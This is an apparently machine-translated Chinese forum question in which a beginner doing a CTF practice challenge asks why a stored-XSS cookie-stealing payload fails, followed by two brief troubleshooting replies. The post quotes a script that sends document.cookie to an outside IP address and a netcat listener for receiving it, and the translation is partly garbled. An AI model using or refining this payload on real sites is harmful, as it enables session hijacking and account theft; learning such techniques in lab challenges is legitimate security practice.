我是计算字段的新手,目前我正在在其中一个脆弱网站上进行一些练习CTF挑战,并找到了XSS漏洞。我知道我可以使用存储的XSS窃取用户cookie,但是我不知道为什么我的代码不起作用,就像为什么当另一个用户进入脆弱页面时,我的cookie却没有记录下来。
i在本XSS注入的文本框中输入了<script> document.write('<img src="http://l92.168.48.6:6790?cookie ='+ escape(document.cookie) + '" />);</script>,但是在Linux终端I类型nc -l -p 6790中,我没有收到任何cookie。就像我做<script>alert(document.cookie)</script>一样,它显示了我的cookie-但我的目的是窃取下一个用户cookie,即当用户访问页面时。
我敢肯定,这对你们来说是如此微不足道,但请帮助一个菜鸟。我是网络安全的新手,我自己是自我教育。
尝试用encodeuricomponent方法替换逃生方法
您实际上得到了什么?您是否在浏览器上检查了网络控制台?要知道是否发送请求?